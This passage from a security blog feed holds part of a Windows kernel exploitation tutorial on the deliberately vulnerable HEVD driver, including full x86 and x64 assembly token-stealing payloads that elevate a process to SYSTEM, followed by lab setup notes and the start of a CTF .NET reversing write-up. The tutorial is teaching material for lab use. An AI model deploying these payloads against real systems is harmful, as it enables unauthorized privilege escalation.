class="n">PAYLOAD</span> <span class="n">ENDP</span> <span class="n">end</span> </code></pre></div></div> <h3 id="generic-x64-payload-wrapper">Generic x64 payload wrapper</h3> <div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">.</span><span class="n">code</span> <span class="n">PUBLIC</span> <span class="n">PAYLOAD</span> <span class="n">PAYLOAD</span> <span class="n">proc</span> <span class="c">; Payload here</span> <span class="n">PAYLOAD</span> <span class="n">ENDP</span> <span class="n">end</span> </code></pre></div></div> <hr /> <h3 id="process-internals-crash-course">Process internals crash course</h3> <ul> <li>Every Windows process is represented by an <a href="http://www.geoffchappell.com/studies/windows/km/ntoskrnl/structs/eprocess/index.htm"><code class="highlighter-rouge">EPROCESS</code></a> structure. <div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code> dt nt!_EPROCESS optional_process_address </code></pre></div> </div> </li> <li> <p>Most of <code class="highlighter-rouge">EPROCESS</code> structures exist in kernel-space, <a href="http://www.geoffchappell.com/studies/windows/win32/ntdll/structs/peb/index.htm"><code class="highlighter-rouge">PEB</code></a> exists in user-space so user-mode code can interact with it. This stucture can be shown using <code class="highlighter-rouge">dt nt!_PEB optional_process_address</code> or <code class="highlighter-rouge">!peb</code> if you’re in a process context.</p> <div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code> kd&gt; !process 0 0 explorer.exe PROCESS ffff9384fb0c35c0 SessionId: 1 Cid: 0fc4 Peb: 00bc3000 ParentCid: 0fb4 DirBase: 3a1df000 ObjectTable: ffffaa88aa0de500 HandleCount: 1729. Image: explorer.exe kd&gt; .process /i ffff9384fb0c35c0 You need to continue execution (press 'g' &lt;enter&gt;) for the context to be switched. When the debugger breaks in again, you will be in the new process context. kd&gt; g Break instruction exception - code 80000003 (first chance) nt!DbgBreakPointWithStatus: fffff802`80002c60 cc int 3 kd&gt; !peb PEB at 0000000000bc3000 InheritedAddressSpace: No ReadImageFileExecOptions: No ... </code></pre></div> </div> </li> <li> <p><code class="highlighter-rouge">EPROCESS</code> structure contains a <code class="highlighter-rouge">Token</code> field that tells the system what privileges this process holds. A privileged process (like System) is what we aim for. If we’re able to steal this token and overwrite the current process’s token with that value, current process will run with higher privileges than it’s intented to. This is called privilege escalation/elevation.</p> </li> <li>Offsets differ per operating system, you’ll need to update payloads with the appropriate values. WinDBG is your friend.</li> </ul> <hr /> <h3 id="token-stealing-payload">Token Stealing Payload</h3> <p>Imagine we can execute any code we want with the goal of replacing the current process token with a more privileged one, where do we go? <code class="highlighter-rouge">PCR</code> struct is an excellent option for us as its location doesn’t change. With some WinDBG help we’ll be able to find the <code class="highlighter-rouge">EPROCESS</code> of the current process and replace its token with that of System (PID 4).</p> <h4 id="1-finding-pcr">1. Finding <a href="http://www.geoffchappell.com/studies/windows/km/ntoskrnl/structs/kpcr.htm"><code class="highlighter-rouge">PCR</code></a></h4> <p><code class="highlighter-rouge">PCR</code> is at a fixed location (<code class="highlighter-rouge">gs:[0]</code> and <code class="highlighter-rouge">fs:[0]</code> for x64/x86)</p> <h4 id="2-locating-pcrbdata">2. Locating PcrbData</h4> <div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kd&gt; dt nt!_KPCR +0x000 NtTib : _NT_TIB +0x000 GdtBase : Ptr64 _KGDTENTRY64 +0x008 TssBase : Ptr64 _KTSS64 +0x010 UserRsp : Uint8B +0x018 Self : Ptr64 _KPCR +0x020 CurrentPrcb : Ptr64 _KPRCB +0x028 LockArray : Ptr64 _KSPIN_LOCK_QUEUE +0x030 Used_Self : Ptr64 Void +0x038 IdtBase : Ptr64 _KIDTENTRY64 +0x040 Unused : [2] Uint8B +0x050 Irql : UChar +0x051 SecondLevelCacheAssociativity : UChar +0x052 ObsoleteNumber : UChar +0x053 Fill0 : UChar +0x054 Unused0 : [3] Uint4B +0x060 MajorVersion : Uint2B +0x062 MinorVersion : Uint2B +0x064 StallScaleFactor : Uint4B +0x068 Unused1 : [3] Ptr64 Void +0x080 KernelReserved : [15] Uint4B +0x0bc SecondLevelCacheSize : Uint4B +0x0c0 HalReserved : [16] Uint4B +0x100 Unused2 : Uint4B +0x108 KdVersionBlock : Ptr64 Void +0x110 Unused3 : Ptr64 Void +0x118 PcrAlign1 : [24] Uint4B +0x180 Prcb : _KPRCB &lt;==== </code></pre></div></div> <h4 id="3-locating-currentthread">3. Locating CurrentThread</h4> <div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kd&gt; dt nt!_KPRCB +0x000 MxCsr : Uint4B +0x004 LegacyNumber : UChar +0x005 ReservedMustBeZero : UChar +0x006 InterruptRequest : UChar +0x007 IdleHalt : UChar +0x008 CurrentThread : Ptr64 _KTHREAD &lt;==== ... </code></pre></div></div> <h4 id="4-locating-current-process-eprocess">4. Locating current process EPROCESS</h4> <p>More of the same, EPROCESS address is at <code class="highlighter-rouge">_KTHREAD.ApcState.Process</code>.</p> <h4 id="5-locating-system-eprocess">5. Locating SYSTEM EPROCESS</h4> <p>Using <code class="highlighter-rouge">_EPROCESS.ActiveProcessLinks.Flink</code> linked list we’re able to iterate over processes. Every iteration we need to check if <code class="highlighter-rouge">UniqueProcessId</code> equals 4 as that’s the System process PID.</p> <h4 id="6-replacing-the-token">6. Replacing the token</h4> <p>If it’s a match we overwrite the target process <code class="highlighter-rouge">Token</code> with that of SYSTEM.</p> <p>Notice that <code class="highlighter-rouge">Token</code> is of type <code class="highlighter-rouge">_EX_FAST_REF</code> and the lower 4 bits aren’t part of it.</p> <div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kd&gt; dt _EX_FAST_REF ntdll!_EX_FAST_REF +0x000 Object : Ptr64 Void +0x000 RefCnt : Pos 0, 4 Bits +0x000 Value : Uint8B </code></pre></div></div> <p>Normally you want to keep that value when replacing the token, but I haven’t run into issues for not replacing it before.</p> <hr /> <h4 id="token-stealing-payload-windows-7-x86-sp1">Token Stealing Payload Windows 7 x86 SP1</h4> <div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">.</span><span class="mi">386</span> <span class="p">.</span><span class="n">model</span> <span class="n">flat</span><span class="p">,</span> <span class="n">c</span> <span class="c">; cdecl / stdcall</span> <span class="n">ASSUME</span> <span class="n">FS</span><span class="o">:</span><span class="n">NOTHING</span> <span class="p">.</span><span class="n">code</span> <span class="n">PUBLIC</span> <span class="n">StealToken</span> <span class="n">StealToken</span> <span class="n">proc</span> <span class="k">pushad</span> <span class="c">; Save registers state</span> <span class="c">; Start of Token Stealing Stub</span> <span class="k">xor</span> <span class="n">eax</span><span class="p">,</span> <span class="n">eax</span> <span class="c">; Set ZERO</span> <span class="k">mov</span> <span class="n">eax</span><span class="p">,</span> <span class="n">DWORD</span> <span class="n">PTR</span> <span class="n">fs</span><span class="o">:</span><span class="err">[</span><span class="n">eax</span> <span class="o">+</span> <span class="mi">124</span><span class="n">h</span><span class="err">]</span> <span class="c">; Get nt!_KPCR.PcrbData.CurrentThread</span> <span class="c">; _KTHREAD is located at FS : [0x124]</span> <span class="k">mov</span> <span class="n">eax</span><span class="p">,</span> <span class="err">[</span><span class="n">eax</span> <span class="o">+</span> <span class="mi">50</span><span class="n">h</span><span class="err">]</span> <span class="c">; Get nt!_KTHREAD.ApcState.Process</span> <span class="k">mov</span> <span class="n">ecx</span><span class="p">,</span> <span class="n">eax</span> <span class="c">; Copy current process _EPROCESS structure</span> <span class="k">mov</span> <span class="n">edx</span><span class="p">,</span> <span class="mi">04</span><span class="n">h</span> <span class="c">; WIN 7 SP1 SYSTEM process PID = 0x4</span> <span class="n">SearchSystemPID</span><span class="o">:</span> <span class="k">mov</span> <span class="n">eax</span><span class="p">,</span> <span class="err">[</span><span class="n">eax</span> <span class="o">+</span> <span class="mi">0</span><span class="n">B8h</span><span class="err">]</span> <span class="c">; Get nt!_EPROCESS.ActiveProcessLinks.Flink</span> <span class="k">sub</span> <span class="n">eax</span><span class="p">,</span> <span class="mi">0</span><span class="n">B8h</span> <span class="k">cmp</span><span class="err">[</span><span class="n">eax</span> <span class="o">+</span> <span class="mi">0</span><span class="n">B4h</span><span class="err">]</span><span class="p">,</span> <span class="n">edx</span> <span class="c">; Get nt!_EPROCESS.UniqueProcessId</span> <span class="k">jne</span> <span class="n">SearchSystemPID</span> <span class="k">mov</span> <span class="n">edx</span><span class="p">,</span> <span class="err">[</span><span class="n">eax</span> <span class="o">+</span> <span class="mi">0</span><span class="n">F8h</span><span class="err">]</span> <span class="c">; Get SYSTEM process nt!_EPROCESS.Token</span> <span class="k">mov</span><span class="err">[</span><span class="n">ecx</span> <span class="o">+</span> <span class="mi">0</span><span class="n">F8h</span><span class="err">]</span><span class="p">,</span> <span class="n">edx</span> <span class="c">; Replace target process nt!_EPROCESS.Token</span> <span class="c">; with SYSTEM process nt!_EPROCESS.Token</span> <span class="c">; End of Token Stealing Stub</span> <span class="n">StealToken</span> <span class="n">ENDP</span> <span class="n">end</span> </code></pre></div></div> <h4 id="token-stealing-payload-windows-7-x64">Token Stealing Payload Windows 7 x64</h4> <div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">.</span><span class="n">code</span> <span class="n">PUBLIC</span> <span class="n">GetToken</span> <span class="n">GetToken</span> <span class="n">proc</span> <span class="c">; Start of Token Stealing Stub</span> <span class="k">xor</span> <span class="n">rax</span><span class="p">,</span> <span class="n">rax</span> <span class="c">; Set ZERO</span> <span class="k">mov</span> <span class="n">rax</span><span class="p">,</span> <span class="n">gs</span><span class="o">:</span><span class="err">[</span><span class="n">rax</span> <span class="o">+</span> <span class="mi">188</span><span class="n">h</span><span class="err">]</span> <span class="c">; Get nt!_KPCR.PcrbData.CurrentThread</span> <span class="c">; _KTHREAD is located at GS : [0x188]</span> <span class="k">mov</span> <span class="n">rax</span><span class="p">,</span> <span class="err">[</span><span class="n">rax</span> <span class="o">+</span> <span class="mi">70</span><span class="n">h</span><span class="err">]</span> <span class="c">; Get nt!_KTHREAD.ApcState.Process</span> <span class="k">mov</span> <span class="n">rcx</span><span class="p">,</span> <span class="n">rax</span> <span class="c">; Copy current process _EPROCESS structure</span> <span class="k">mov</span> <span class="n">r11</span><span class="p">,</span> <span class="n">rcx</span> <span class="c">; Store Token.RefCnt</span> <span class="k">and</span> <span class="n">r11</span><span class="p">,</span> <span class="mi">7</span> <span class="k">mov</span> <span class="n">rdx</span><span class="p">,</span> <span class="mi">4</span><span class="n">h</span> <span class="c">; WIN 7 SP1 SYSTEM process PID = 0x4</span> <span class="n">SearchSystemPID</span><span class="o">:</span> <span class="k">mov</span> <span class="n">rax</span><span class="p">,</span> <span class="err">[</span><span class="n">rax</span> <span class="o">+</span> <span class="mi">188</span><span class="n">h</span><span class="err">]</span> <span class="c">; Get nt!_EPROCESS.ActiveProcessLinks.Flink</span> <span class="k">sub</span> <span class="n">rax</span><span class="p">,</span> <span class="mi">188</span><span class="n">h</span> <span class="k">cmp</span><span class="err">[</span><span class="n">rax</span> <span class="o">+</span> <span class="mi">180</span><span class="n">h</span><span class="err">]</span><span class="p">,</span> <span class="n">rdx</span> <span class="c">; Get nt!_EPROCESS.UniqueProcessId</span> <span class="k">jne</span> <span class="n">SearchSystemPID</span> <span class="k">mov</span> <span class="n">rdx</span><span class="p">,</span> <span class="err">[</span><span class="n">rax</span> <span class="o">+</span> <span class="mi">208</span><span class="n">h</span><span class="err">]</span> <span class="c">; Get SYSTEM process nt!_EPROCESS.Token</span> <span class="k">and</span> <span class="n">rdx</span><span class="p">,</span> <span class="mi">0</span><span class="n">fffffffffffffff0h</span> <span class="k">or</span> <span class="n">rdx</span><span class="p">,</span> <span class="n">r11</span> <span class="k">mov</span><span class="err">[</span><span class="n">rcx</span> <span class="o">+</span> <span class="mi">208</span><span class="n">h</span><span class="err">]</span><span class="p">,</span> <span class="n">rdx</span> <span class="c">; Replace target process nt!_EPROCESS.Token</span> <span class="c">; with SYSTEM process nt!_EPROCESS.Token</span> <span class="c">; End of Token Stealing Stub</span> <span class="n">GetToken</span> <span class="n">ENDP</span> <span class="n">end</span> </code></pre></div></div> <hr /> <p><em>-Abatchy</em></p> Mon, 01 Jan 2018 10:00:00 +0000 http://abatchy17.github.io/2018/01/kernel-exploitation-2 http://abatchy17.github.io/2018/01/kernel-exploitation-2 [Kernel Exploitation] 1: Setting up the environment <p><em>The <a href="https://github.com/hacksysteam/HackSysExtremeVulnerableDriver">HackSysExtremeVulnerableDriver</a> by HackSysTeam always interested me and I got <a href="https://twitter.com/abatchy17/status/939572701345148928">positive feedback</a> on writing about it, so here we are.</em></p> <p><em>Repo with all code can be found <a href="https://github.com/abatchy17/HEVD-Exploits">here</a>.</em></p> <hr /> <p>This N-part tutorial will walk you through the kernel exploit development cycle. It’s important to notice that we will be dealing with known vulnerabilities, no reversing is needed (for the driver at least).</p> <p>By the end of tutorial, you should be familiar with common vulnerability classes and how they’re exploited, able to port exploits from x86 to x64 arch (if possible) and be familiar with newer mitigations in Windows 10.</p> <h3 id="whats-kernel-debugging">What’s kernel debugging?</h3> <p>Unlike user-mode debugging where you can pause execution of a single process, kernel-mode debugging breaks on the entire system, meaning you won’t be able to use it at all. A debugger machine is needed so you can communicate with the debuggee, observe memory or kernel data structures, or catch a crash.</p> <p>Reading material:</p> <ul> <li><a href="https://docs.microsoft.com/en-us/windows-hardware/drivers/gettingstarted/user-mode-and-kernel-mode">User mode and kernel mode</a></li> <li><a href="https://blog.codinghorror.com/understanding-user-and-kernel-mode/">Understanding User and Kernel Mode</a></li> </ul> <h3 id="whats-kernel-exploitation">What’s kernel exploitation?</h3> <p>Something more fun than user-mode exploitation ;)</p> <p>The main goal is to gain execution with kernel-mode context. A successful exploit could result in elevated permissions and what you can do is only bound by your imagination (anywhere from cool homebrew to APT-sponsored malware).</p> <p>Goal for this tutorial is getting a shell with SYSTEM permissions.</p> <h3 id="how-will-this-tutorial-be-organized">How will this tutorial be organized?</h3> <ul> <li>Part 1: Setting up the environment <ul> <li>Configure the 3 VMs + debuggee machine.</li> <li>Configure WinDBG.</li> </ul> </li> <li>Part 2: Payloads <ul> <li>Placeholder for common payloads to be used later, this will allow us to focus on vulnerability-specific details in future posts and refer to this post when needed.</li> </ul> </li> <li>Part 3-N: <ul> <li>One or more post per vulnerability.</li> </ul> </li> </ul> <h3 id="kernel-exploit-development-lifecycle">Kernel exploit development lifecycle</h3> <ol> <li><strong>Finding a vulnerability</strong>: This won’t be covered in this tutorial as we already know exactly where the vulnerabilities are.</li> <li><strong>Hijacking execution flow</strong>: Some vulnerabilities allow code execution, others require more than that.</li> <li><strong>Privilege escalation</strong>: Main goal will be to get a shell with SYSTEM privileges.</li> <li><strong>Restore execution flow</strong>: Uncaught exceptions in kernel-mode result in a system crash. Unless a DoS exploit makes you sleep at night we need to address this.</li> </ol> <h3 id="what-are-the-targets">What are the targets?</h3> <p>Exploitation will be attempted on the following targets (no specific version is needed yet):</p> <ol> <li>a Win7 x86 VM</li> <li>a Win7 x64 VM</li> <li>a Win10 x64 VM</li> </ol> <p>Normally we’ll start with the x86 machine, followed by porting it to the Win7 x64 one. Some exploits won’t run on the Win10 machine due to some newer mitigations that are added. We’ll either have to tweak the exploit or come up with an entirely different approach.</p> <h3 id="what-software-do-i-need">What software do I need?</h3> <ul> <li>Hyper-visor software, <a href="https://www.virtualbox.org/wiki/Downloads">lots</a> <a href="https://my.vmware.com/web/vmware/downloads">of</a> <a href="https://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/about/">options</a>.</li> <li>Windows 7 x86 VM</li> <li>Windows 7 x64 VM</li> <li>Windows 10 x64 VM</li> <li><a href="http://virtualkd.sysprogs.org/download/">VirtualKD</a></li> <li><a href="https://www.osronline.com/article.cfm?article=157">OSR Driver Loader</a></li> </ul> <hr /> <h3 id="setting-up-the-debuggee-machines">Setting up the debuggee machines</h3> <p>The debuggee is our guinea pig. We’ll use it to load the vulnerable driver and communicate with it. This machine will crash a lot as most exceptions in kernel will result in BSOD. Make sure you give it enough RAM.</p> <p>Per debuggee:</p> <ol> <li> <p>Inside the VirtualKD folder, run <code class="highlighter-rouge">target\vminstall.exe</code>. This will add a boot entry that has debugging enabled and connects automatically to the VirtualKD server on the debugger machine.<br /> For the Windows 10 VM, you need to enable test signing. This allows you to load unsigned drivers into the kernel. <br /> Running <code class="highlighter-rouge">bcdedit /set testsinging on</code> and rebooting will show “Test Mode” on the desktop.</p> <p><em>NOTE: Windows 10 supports communicating through the network and in my experience is usually faster. To do that, follow <a href="https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/setting-up-a-network-debugging-connection">this</a>.</em></p> </li> <li> <p>Run the OSR Driver Loader, register the service then start it. You may need to reboot.</p> </li> <li> <p>Optional: Install VM guest additions.</p> </li> <li> <p>Set up a low-priv account, this should be used while exploiting.</p> <div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code> C:\Windows\system32&gt;net user low low /add The command completed successfully. </code></pre></div> </div> </li> </ol> <hr /> <h3 id="setting-up-the-debugger-machine">Setting up the debugger machine</h3> <p>This machine will be the one debugging the debuggee machine through WinDBG. You’ll be able to inspect memory and data structures and manipulate them if needed. Having a remote debugging session running when the debuggee crashes allows us to break into the VM and/or analyze a crash.</p> <p>VirtualKD host will automatically communicate with a named pipe instead of setting it up manually. If you’re <a href="https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/setting-up-a-network-debugging-connection">network debugging</a> the Win10 VM, you’ll need to test the connection manually.</p> <ol> <li> <p>Install the Windows SDK (<a href="https://developer.microsoft.com/en-us/windows/downloads/windows-10-sdk] for Win10">link</a>). You can select the “Debugging Tools for Windows” only.</p> </li> <li> <p>Verify that WinDBG is installed, Win10 SDK is by default installed in <code class="highlighter-rouge">C:\Program Files (x86)\Windows Kits\10\Debuggers</code>. <br /> Add it to the system path and set up the debugger path in VirtualKD.</p> </li> </ol> <p>Reboot one of the debuggee machines while the VirtualKD host is running on the debugger. You should be able to start a WinDBG session.</p> <hr /> <h3 id="setting-up-windbg">Setting up WinDBG</h3> <p>If everything is set up correctly, WinDBG will pause execution and print some info about the debuggee.</p> <p><img src="http://abatchy17.github.io/images/kernel1.png" alt="WinDBG_screenshot_1" /></p> <p>Symbols contain debugging information for lots of Windows binaries. We can get them by executing the following:</p> <div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>.sympath srv*c:\Symbols*http://msdl.microsoft.com/download/symbols;C:\HEVD .reload /f *.* </code></pre></div></div> <p>Enable verbose debugging:</p> <div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ed nt!Kd_Default_Mask 0xf </code></pre></div></div> <p>You should be able to find the HEVD module loaded:</p> <div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kd&gt; lm m HEVD Browse full module list start end module name fffff80b`92b50000 fffff80b`92b59000 HEVD (deferred) </code></pre></div></div> <p>Save the workspace profile and any environment changes you made by selecting</p> <div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>File -&gt; Save Workspace to File </code></pre></div></div> <p><a href="http://windbg.info/doc/1-common-cmds.html">This</a> is a handy reference to commands used throughout the series.</p> <p>Type <code class="highlighter-rouge">g</code> or hit F5 to continue execution.</p> <hr /> <h3 id="hevd-driver-crash-course">HEVD Driver crash course</h3> <ul> <li><a href="https://msdn.microsoft.com/en-us/library/windows/hardware/ff544113%28v=vs.85%29.aspx?f=255&amp;MSPPError=-2147217396"><code class="highlighter-rouge">DriverEntry</code></a> is the entry point of any driver.</li> </ul> <div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">NTSTATUS</span> <span class="nf">DriverEntry</span><span class="p">(</span><span class="n">IN</span> <span class="n">PDRIVER_OBJECT</span> <span class="n">DriverObject</span><span class="p">,</span> <span class="n">IN</span> <span class="n">PUNICODE_STRING</span> <span class="n">RegistryPath</span><span class="p">)</span> <span class="p">{</span> <span class="n">UINT32</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">PDEVICE_OBJECT</span> <span class="n">DeviceObject</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span> <span class="n">NTSTATUS</span> <span class="n">Status</span> <span class="o">=</span> <span class="n">STATUS_UNSUCCESSFUL</span><span class="p">;</span> <span class="n">UNICODE_STRING</span> <span class="n">DeviceName</span><span class="p">,</span> <span class="n">DosDeviceName</span> <span class="o">=</span> <span class="p">{</span><span class="mi">0</span><span class="p">};</span> <span class="n">UNREFERENCED_PARAMETER</span><span class="p">(</span><span class="n">RegistryPath</span><span class="p">);</span> <span class="n">PAGED_CODE</span><span class="p">();</span> <span class="n">RtlInitUnicodeString</span><span class="p">(</span><span class="o">&amp;</span><span class="n">DeviceName</span><span class="p">,</span> <span class="s">L"</span><span class="se">\\</span><span class="s">Device</span><span class="se">\\</span><span class="s">HackSysExtremeVulnerableDriver"</span><span class="p">);</span> <span class="n">RtlInitUnicodeString</span><span class="p">(</span><span class="o">&amp;</span><span class="n">DosDeviceName</span><span class="p">,</span> <span class="s">L"</span><span class="se">\\</span><span class="s">DosDevices</span><span class="se">\\</span><span class="s">HackSysExtremeVulnerableDriver"</span><span class="p">);</span> <span class="c1">// Create the device </span> <span class="n">Status</span> <span class="o">=</span> <span class="n">IoCreateDevice</span><span class="p">(</span><span class="n">DriverObject</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">DeviceName</span><span class="p">,</span> <span class="n">FILE_DEVICE_UNKNOWN</span><span class="p">,</span> <span class="n">FILE_DEVICE_SECURE_OPEN</span><span class="p">,</span> <span class="n">FALSE</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">DeviceObject</span><span class="p">);</span> <span class="p">...</span> <span class="p">}</span> </code></pre></div></div> <ul> <li> <p>This routine contains an <code class="highlighter-rouge">IoCreateDevice</code> call that contains the driver name we’ll be using to communicate with it.</p> </li> <li> <p><a href="https://msdn.microsoft.com/en-us/library/windows/hardware/ff544174(v=vs.85).aspx"><code class="highlighter-rouge">DriverObject</code></a> will get populated with necesarry structures and function pointers.</p> </li> <li> <p>What matters to us for HEVD is the function pointer assigned to <a href="https://github.com/hacksysteam/HackSysExtremeVulnerableDriver/blob/64f2e9a1eadc7974bfc151258751f6218c469530/Driver/HackSysExtremeVulnerableDriver.c#L109"><code class="highlighter-rouge">DriverObject-&gt;MajorFunction[IRP_MJ_DEVICE_CONTROL]</code></a> which is routine responsible for handling IOCTLs.</p> </li> <li> <p>In HEVD, this function is called <a href="https://github.com/hacksysteam/HackSysExtremeVulnerableDriver/blob/64f2e9a1eadc7974bfc151258751f6218c469530/Driver/HackSysExtremeVulnerableDriver.c#L193"><code class="highlighter-rouge">IrpDeviceIoCtlHandler</code></a> and it’s basically a large switch case for every IOCTL. Ever vulnerability has a unique IOCTL.</p> </li> </ul> <p>Example: <code class="highlighter-rouge">HACKSYS_EVD_IOCTL_STACK_OVERFLOW</code> is the IOCTL used to trigger the stack overflow vulnerability.</p> <hr /> <p>That’s it! Next post will discuss payloads. For now, it’ll only include a generic token-stealing payload that’ll be used for part 3.</p> <hr /> <p><em>I’m aware this post doesn’t cover lots of issues you can run into. Due to the scope of this tutorial, you’ll need to figure out a lot on your own, but you’re welcome to comment with your questions if needed.</em></p> <p><em>-Abatchy</em></p> Mon, 01 Jan 2018 10:00:00 +0000 http://abatchy17.github.io/2018/01/kernel-exploitation-1 http://abatchy17.github.io/2018/01/kernel-exploitation-1 [DefCamp CTF Qualification 2017] Don't net, kids! (Revexp 400) <h2 id="dont-net-kids">Don’t net, kids!</h2> <p>You’re provided with a <a href="http://ccsir.org/files/dotnot.zip">big zip file</a> that contains mostly dot net libraries and a few challenge specific ones. Since the name of the challenge hints to be a .Net reversing challenge I focused on DCTFNetCoreWebApp.dll.</p> <p>I used dotPeek to decompile it and found the following:</p> <ol> <li><code class="highlighter-rouge">DCTFNetCoreWebApp</code>: Mostly some logic to get the webapp running.</li> <li><code class="highlighter-rouge">DCTFNetCoreWebApp.Business</code>: Contains the API logic (the Executor class). This contains the allowed actions as well (Notice how getflag is considered an AdminCommand).</li> <li> <p><code class="highlighter-rouge">DCTFNetCoreWebApp.Controllers</code>: Parser for GET/POST requests revealing the route (/api/command)</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp"> abatchy@ubuntu:~/Desktop$</span> curl https://dotnot.dctf-quals-17.def.camp/api/command <span class="go"> Hi! Nothing here :) </span></code></pre></div> </div> </li> <li><code class="highlighter-rouge">DCTFNetCoreWebApp.Models</code>: Models defining the command layout which we’ll need to communicate with the API.</li> </ol> <p>The meat of the code is the <code class="highlighter-rouge">Execute</code> method:</p> <div class="language-csharp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">public</span> <span class="n">Command</span> <span class="nf">Execute</span><span class="p">(</span><span class="n">Command</span> <span class="n">command</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// Need to be authenticated</span> <span class="k">if</span> <span class="p">(</span><span class="k">this</span><span class="p">.</span><span class="n">_guestActions</span><span class="p">.</span><span class="nf">Contains</span><span class="p">(</span><span class="n">command</span><span class="p">.</span><span class="n">Action</span><span class="p">.</span><span class="nf">ToLower</span><span class="p">()))</span> <span class="k">return</span> <span class="k">this</span><span class="p">.</span><span class="nf">Authenticate</span><span class="p">(</span><span class="n">command</span><span class="p">);</span> <span class="k">if</span> <span class="p">(!</span><span class="k">this</span><span class="p">.</span><span class="nf">IsAuthenticated</span><span class="p">(</span><span class="n">command</span><span class="p">))</span> <span class="k">throw</span> <span class="k">new</span> <span class="nf">Exception</span><span class="p">(</span><span class="s">"Authentication required!"</span><span class="p">);</span> <span class="c1">// Is the command of type AdminCommand?</span> <span class="kt">bool</span> <span class="n">flag</span> <span class="p">=</span> <span class="p">((</span><span class="n">MemberInfo</span><span class="p">)</span> <span class="n">command</span><span class="p">.</span><span class="nf">GetType</span><span class="p">()).</span><span class="nf">get_Name</span><span class="p">().</span><span class="nf">Equals</span><span class="p">(((</span><span class="n">MemberInfo</span><span class="p">)</span> <span class="k">typeof</span> <span class="p">(</span><span class="n">AdminCommand</span><span class="p">)).</span><span class="nf">get_Name</span><span class="p">());</span> <span class="k">if</span> <span class="p">(</span><span class="k">this</span><span class="p">.</span><span class="n">_adminActions</span><span class="p">.</span><span class="nf">Contains</span><span class="p">(</span><span class="n">command</span><span class="p">.</span><span class="n">Action</span><span class="p">.</span><span class="nf">ToLower</span><span class="p">())</span> <span class="p">&amp;&amp;</span> <span class="p">!</span><span class="n">flag</span><span class="p">)</span> <span class="k">throw</span> <span class="k">new</span> <span class="nf">Exception</span><span class="p">(</span><span class="s">"Command not allowed!"</span><span class="p">);</span> <span class="k">if</span> <span class="p">(!</span><span class="k">this</span><span class="p">.</span><span class="n">_userActions</span><span class="p">.</span><span class="nf">Contains</span><span class="p">(</span><span class="n">command</span><span class="p">.</span><span class="n">Action</span><span class="p">.</span><span class="nf">ToLower</span><span class="p">())</span> <span class="p">&amp;&amp;</span> <span class="p">!</span><span class="n">flag</span><span class="p">)</span> <span class="k">throw</span> <span class="k">new</span> <span class="nf">Exception</span><span class="p">(</span><span class="s">"Invalid action"</span><span class="p">);</span> <span class="kt">string</span> <span class="n">lower</span> <span class="p">=</span> <span class="n">command</span><span class="p">.</span><span class="n">Action</span><span class="p">.</span><span class="nf">ToLower</span><span class="p">();</span> <span class="k">if</span> <span class="p">(</span><span class="n">lower</span> <span class="p">==</span> <span class="s">"get"</span><span class="p">)</span> <span class="k">return</span> <span class="k">this</span><span class="p">.</span><span class="nf">Get</span><span class="p">(</span><span class="n">command</span><span class="p">);</span> <span class="k">if</span> <span class="p">(</span><span class="n">lower</span> <span class="p">==</span> <span class="s">"set"</span><span class="p">)</span> <span class="k">return</span> <span class="k">this</span><span class="p">.</span><span class="nf">Set</span><span class="p">(</span><span class="n">command</span><span class="p">);</span> <span class="k">if</span> <span class="p">(</span><span class="n">lower</span> <span class="p">==</span> <span class="s">"list"</span><span class="p">)</span> <span class="k">return</span> <span class="k">this</span><span class="p">.</span><span class="nf">List</span><span class="p">(</span><span class="n">command</span><span class="p">);</span> <span class="k">if</span> <span class="p">(</span><span class="n">lower</span> <span class="p">==</span> <span class="s">"readflag"</span><span class="p">)</span> <span class="k">return</span> <span class="k">this</span><span class="p">.</span><span class="nf">ReadFlag</span><span class="p">(</span><span class="n">command</span><span class="p">);</span> <span class="k">throw</span> <span class="k">new</span> <span class="nf">Exception</span><span class="p">(</span><span class="s">"Command not implemented!"</span><span class="p">);</span> <span class="p">}</span> </code></pre></div></div> <ol> <li>You need to be authenticated.</li> <li>Command needs to be of <code class="highlighter-rouge">AdminCommand</code> type (inherited).</li> </ol> <p>Let’s try first just contacting the API with a command. Parser for POST:</p> <div class="language-csharp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">[HttpPost]</span> <span class="k">public</span> <span class="kt">string</span> <span class="nf">Post</span><span class="p">()</span> <span class="p">{</span> <span class="k">if</span> <span class="p">(((</span><span class="n">ControllerBase</span><span class="p">)</span> <span class="k">this</span><span class="p">).</span><span class="nf">get_Request</span><span class="p">().</span><span class="nf">get_Body</span><span class="p">().</span><span class="nf">get_CanSeek</span><span class="p">())</span> <span class="p">((</span><span class="n">ControllerBase</span><span class="p">)</span> <span class="k">this</span><span class="p">).</span><span class="nf">get_Request</span><span class="p">().</span><span class="nf">get_Body</span><span class="p">().</span><span class="nf">set_Position</span><span class="p">(</span><span class="m">0L</span><span class="p">);</span> <span class="kt">string</span> <span class="n">end</span> <span class="p">=</span> <span class="p">((</span><span class="n">TextReader</span><span class="p">)</span> <span class="k">new</span> <span class="nf">StreamReader</span><span class="p">(((</span><span class="n">ControllerBase</span><span 